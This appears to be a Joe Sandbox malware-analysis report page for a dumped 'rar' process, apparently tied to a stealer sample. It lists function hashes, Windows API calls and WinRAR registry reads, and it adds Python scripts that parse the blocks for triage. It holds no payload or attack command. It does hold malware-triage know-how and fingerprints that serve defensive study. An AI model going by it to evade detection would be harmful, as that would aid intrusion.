                                                                                                                                                                                                                                        • Instruction ID: 97035f92447a87ad8b02556127b1d37e70de1a6bacae39024de7ee4220076fa8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB01AD2AB0868082E7408B12A94433D6761EBC0FD0F188076CE4E83B68DF7EDD46C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Char
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 751630497-0
                                                                                                                                                                                                                                        • Opcode ID: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                        • Instruction ID: d1db1b02d44bad293199228e395968304b4172fa153af513bfda096166d4349b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d750600f3be21f8ccd2522ea66ef81f5d73d07ec8a0f66ae2bb9041de05645a8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B229032A0D682E6E716DF30D4801FE7BA0FB44B88F584177DA8D86699DE78ED46C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0552f59dc804d2e0d20b2d282ad9cfd142ccfb886900338c14155ce18a5671af
                                                                                                                                                                                                                                        • Instruction ID: 2521cd7a68155f4af9510f4a998c4800feb86ae5f15487d6c1c421752166c940
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0552f59dc804d2e0d20b2d282ad9cfd142ccfb886900338c14155ce18a5671af
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8671C132A0668586D745DF35E4052ED33E2FB88B98F084136DB5DCB399DF78A852C790
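The Similarity blocks above (one per function in the dumped rar image: API ID, Opcode ID, Instruction Fuzzy Hash, plus the memory region the function was lifted from) are what you pivot on when comparing this sample against other Joe Sandbox reports. Reading them by hand across hundreds of functions is impractical, so the following Python parses the blocks into records, derives each function's region RVA, and tags functions whose API vocabulary suggests key material or file enumeration. This is an added example, not code from the Joe Sandbox report or its IDA plugin; the sample text is constructed from two of the report's own blocks. Assumptions are ours: a block starts at a "Memory Dump Source" line, the fourth dot-separated token of the .sdmp name is the region's start address, the API ID is treated as a bag of CamelCase words rather than decoded into Win32 function names, and the INTERESTING vocabulary is a triage heuristic, not a Joe Sandbox classification.

```python
"""Parse Joe Sandbox 'Memory Dump Source' / 'Similarity' blocks into records.

Added example, not part of the Joe Sandbox report or its IDA plugin.
SAMPLE is constructed from two blocks of this report (hash values copied as
printed; one 'Download File' link residue left in on purpose).
"""
import re
from collections import Counter

SAMPLE = """\
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction Fuzzy Hash: F541C732B0A6C1E6DA659B65E4402E963A0FB497B4F404372EA7D833C5DF7CE95A8700
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction Fuzzy Hash: CB01AD2AB0868082E7408B12A94433D6761EBC0FD0F188076CE4E83B68DF7EDD46C700
APIs
"""

FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*?)\s*$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$"
)
CAMEL_RE = re.compile(r"[A-Z][a-z0-9]*")

# Triage vocabulary (ours, not Joe Sandbox's): API-ID words worth a closer
# look in a stealer that packs loot into password-protected archives.
INTERESTING = {"crypto": {"Crypt"}, "random": {"Random"}, "file_enum": {"Find"}}


def parse_blocks(text):
    """Split report text into one dict per 'Memory Dump Source' block."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {"associated": []}
            blocks.append(cur)
            continue
        m = FIELD_RE.match(line) if cur is not None else None
        if not m:
            continue
        key, val = m.group(1), m.group(2)
        val = re.sub(r"Download File$", "", val).strip()  # strip HTML link residue
        if key == "Source File":
            sm = SOURCE_RE.match(val)
            cur["dump"] = sm["file"] if sm else val
            if sm:
                cur["image_base"] = int(sm["offset"], 16)
                cur["is_pe"] = sm["pe"].lower() == "true"
        elif key == "Associated":
            cur["associated"].append(val)
        else:
            cur[key.lower().replace(" ", "_")] = val  # e.g. "api_id", "opcode_id"
    return blocks


def api_words(api_id):
    """Split an 'API ID' such as 'Crypt$Context$AcquireRandomRelease' into
    CamelCase words. Assumption: '$' separates groups and capitals separate
    words; no attempt is made to rebuild exact Win32 function names."""
    words = []
    for group in api_id.split("$"):
        words.extend(CAMEL_RE.findall(group))
    return words


def region_rva(block):
    """Assumption: the fourth dot-separated token of the .sdmp name is the
    dumped region's start address (it matches the Offset field in this report)."""
    return int(block["dump"].split(".")[3], 16) - block["image_base"]


def tag_block(block):
    """Return the INTERESTING tags whose vocabulary overlaps the API ID words."""
    words = set(api_words(block.get("api_id", "")))
    return sorted(tag for tag, vocab in INTERESTING.items() if words & vocab)


def duplicate_opcode_ids(blocks):
    """Opcode IDs listed more than once (the same function lifted twice)."""
    counts = Counter(b.get("opcode_id") for b in blocks if b.get("opcode_id"))
    return {k: n for k, n in counts.items() if n > 1}


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(f"rva=0x{region_rva(b):x} tags={tag_block(b)} api_id={b['api_id']}")
```

Run it against the full report text and the Opcode ID / Instruction Fuzzy Hash values become a lookup set for other reports; a function tagged both crypto and random in a sample that also triggers "Rar Usage with Password" is the first one worth opening in the .jbxd snapshot.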

Control-flow Graph
• Executed
• Not Executed
(rendered graph omitted; the function's entry block is at 7ff6aa1c3ea8 and one of its blocks calls GetModuleFileNameW)
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction ID: cf4814180cfc0fb5bee661fd98a204b309c43573aebd9021cd7e86257ea268db
• Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
• Instruction Fuzzy Hash: AA229C22B1E692E4EA229F15D4446F963A1FF44784F804177EA4EC7AD9EF2CED46C300

Control-flow Graph
APIs
Strings
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: 6ecca37bedf4c57e258ac0f0552123388204c5784dd045750a7e5eeb0343d54f
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: 22C1B621A0A582E0EA67AF34CA511FC1355AF45798F4841B7DA4EDB6DADE2CEE07C300

Control-flow Graph
APIs
Strings
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: 0a3e194f6cebac5f86c1304ccc162319d4eaa3fa86236cde3163cde75b4a1548
• Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction Fuzzy Hash: 76417C24A0AA82E1FA429F12AE4097967A0BF45BD4F4901F7CC6D877A4DE7CF8579300

Control-flow Graph

APIs
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 552178382-0
                                                                                                                                                                                                                                        • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                        • Instruction ID: 1c977e5bb0b35cd39942883759b103812d53e898777c36dcbd471792b42d9054
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1314D11E0E283E5FA16AB24A5913B923D1AF55784F4400BBEA4ECB6D7DE6DEC07C240

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C47DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C48A6
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
• Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction ID: 1ab10900c490c9293b5b8afe0d788f01cbe5f70176ae2d2f92c4d3707c3f4ed9
• Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction Fuzzy Hash: 9931E32271AA81E1EB51DF21E8052BE6351FF84794F404272EE4D87B99EF6CD906C700

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B43D1
• RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B4402
• RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B440D
• GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B443E
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: f05980d9d83ed74343c6a0244310feb7ee911bea0e0dc0c4dd5936b9bcfca47a
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: 72116F26619741E1EB529F21E8005A97360FF84BC4F445176EA4E43756EE3CD806C700
Note: Software\WinRAR\General\LanguageFolder (previous function) and Software\WinRAR\Paths\AppData (this function) are WinRAR's own settings values, and this dump belongs to the process Joe Sandbox labels rar (hcaresult_70_2_7ff6aa180000_rar.jbxd). Both functions are therefore consistent with the rar binary reading its configuration at start-up, not with stealer-specific logic; for triage they only confirm that the rar process ran.
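The two function entries above are easier to triage as structured data than as bullets. The following Python script is an added example for this page (not Joe Sandbox code and not code from the analysed sample): it parses the "APIs" bullets and the "Similarity" fields into records and recovers the registry value each function reads. REPORT_TEXT is copied from the two entries above with the indentation removed. One assumption is made: for a RegOpenKeyExW/RegQueryValueExW pair, the backslash-containing string is taken as the key path and the remaining string as the value name; the report itself does not say which string feeds which call.

```python
"""Turn the per-function "APIs" bullets and "Similarity" fields of a Joe
Sandbox report into structured records, then recover the registry value
each function reads.

Added example for this report page; not Joe Sandbox code and not code from
the analysed sample. REPORT_TEXT is copied from the two WinRAR registry
functions on this page. Assumption: the backslash-containing string of a
RegOpenKeyExW/RegQueryValueExW pair is the key path, the other string the
value name (the report does not state this).
"""
import re
from dataclasses import dataclass, field

REPORT_TEXT = r"""
APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C47DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C4853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6AA1C495D,?,?,?,00007FF6AA1B7E7D), ref: 00007FF6AA1C48A6
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B43D1
• RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B4402
• RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B440D
• GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1B443E
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
"""

# "• Api.MODULE(args), ref: ADDRESS"; the bullet is optional so that lines
# copied without it still parse.
API_RE = re.compile(r"^(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?:•\s*)?(?P<name>[A-Za-z ]+?):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int  # call-site address inside the dump


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    strings: list = field(default_factory=list)
    api_string_id: str = ""


def parse_report(text):
    """One FunctionRecord per 'APIs' section, in page order."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line:
            continue
        if m := API_RE.match(line):
            current.calls.append(ApiCall(m["api"], m["module"], m["args"].split(","), int(m["ref"], 16)))
        elif m := FIELD_RE.match(line):
            name, value = m["name"], m["value"]
            if name == "API ID":
                current.api_id = value
            elif name == "String ID":
                current.strings = [s for s in value.split("$") if s]  # '$' separates strings
            elif name == "API String ID":
                current.api_string_id = value
    return records


def registry_reads(rec):
    """Key\\Value pairs the function reads (assumption: strings with a
    backslash are key paths, the rest are value names)."""
    apis = {c.api for c in rec.calls}
    if not {"RegOpenKeyExW", "RegQueryValueExW"} <= apis:
        return []
    keys = [s for s in rec.strings if "\\" in s]
    values = [s for s in rec.strings if "\\" not in s]
    return [f"{k}\\{v}" for k in keys for v in values]


def uses_api(rec, api):
    return any(c.api == api for c in rec.calls)


def triage(text):
    """Per function: registry values read, whether the value is passed through
    ExpandEnvironmentStringsW, and call sites for cross-referencing the dump."""
    return [{
        "api_id": rec.api_id,
        "registry": registry_reads(rec),
        "expands_env": uses_api(rec, "ExpandEnvironmentStringsW"),
        "call_sites": [f"{c.api}@{c.ref:016X}" for c in rec.calls],
    } for rec in parse_report(text)]


if __name__ == "__main__":
    for entry in triage(REPORT_TEXT):
        print(entry)
```

The output names the registry values the two functions touch (Software\WinRAR\General\LanguageFolder and Software\WinRAR\Paths\AppData), which is what lets an analyst file them as WinRAR configuration reads rather than as credential access.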

Control-flow Graph

Rendered graph (legend: Executed / Not Executed) not reproduced. The edge list Joe Sandbox printed for it describes the function whose entry block starts at 0x7FF6AA187A5B (60 basic blocks between 0x7FF6AA187A5B and 0x7FF6AA187FBE). No block carries a Win32 API annotation; the blocks only call internal subroutines (7ff6aa1a1d34, 7ff6aa183f04, 7ff6aa199be0, 7ff6aa1a1e1c, 7ff6aa18b540, 7ff6aa18aa68, 7ff6aa1d9b98, 7ff6aa188d98, 7ff6aa1b9354, 7ff6aa1a6378, 7ff6aa185414, 7ff6aa1b98dc, 7ff6aa1b9958, 7ff6aa1da444, 7ff6aa1acf8c, 7ff6aa1a8ae8, 7ff6aa1b9990, 7ff6aa181204, 7ff6aa181314, 7ff6aa1dba34, 7ff6aa1b941c, 7ff6aa181400, 7ff6aa1a6424, 7ff6aa1b9680).
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID: H9
• API String ID: 0-2207570329
• Opcode ID: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
• Instruction ID: 03650d88d8166d30494b4e3a809dc382f25ac469b11ff2364c067007cd70cfd3
• Opcode Fuzzy Hash: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
• Instruction Fuzzy Hash: 1DE1E362A0AA92D5EB12DB24E084BFD27E5FB4978CF494576CE0D83785DF38E946C300

Control-flow Graph
(rendered graph not captured; the following is recovered from its node labels) 24 basic blocks spanning 7ff6aa1a2574-7ff6aa1a2756, entry block 7ff6aa1a2574, single exit block 7ff6aa1a273a. Blocks with API calls, in address order: 7ff6aa1a25ab GetStdHandle; 7ff6aa1a25cf WriteFile; 7ff6aa1a2619 WriteFile; 7ff6aa1a2658 GetLastError, call 7ff6aa1a3144, SetLastError. Other internal call targets: 7ff6aa19c95c (block 7ff6aa1a26bc), 7ff6aa19cf34 (block 7ff6aa1a26ad), 7ff6aa19cf14 (block 7ff6aa1a2721).
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ErrorFileLastWrite$Handle
• String ID:
• API String ID: 3350704910-0
• Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction ID: 1e79137ee4232d0bee9d2a78e0708f5fc35677f5baf0f920617faf4ae9545292
• Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
